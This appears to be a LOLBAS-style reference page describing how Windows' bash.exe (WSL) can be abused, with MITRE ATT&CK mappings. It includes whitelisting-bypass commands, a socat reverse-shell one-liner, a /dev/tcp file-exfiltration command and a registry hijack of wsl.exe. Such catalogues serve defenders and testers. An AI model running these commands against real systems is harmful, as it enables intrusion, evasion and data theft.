🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Bash.exe

Bash.exe

File used by Windows subsystem for Linux

AWL Bypass

Performs execution of specified file, can be used to bypass Application Whitelisting.

bash.exe -c "{CMD}"

Executes executable from bash.exe — MITRE: T1202 — Privileges: User

Execute

Performs execution of specified file, can be used as a defensive evasion.

bash.exe -c "{CMD}"

Executes executable from bash.exe — MITRE: T1202 — Privileges: User

Performs execution of specified file, can be used as a defensive evasion.

bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"

Executes a reverse shell — MITRE: T1202 — Privileges: User

Performs execution of specified file, can be used as a defensive evasion.

bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'

Exfiltrate data — MITRE: T1202 — Privileges: User

Execute a payload as a child process of `bash.exe` while masquerading as WSL.

bash.exe

When executed, `bash.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder. — MITRE: T1218 — Privileges: User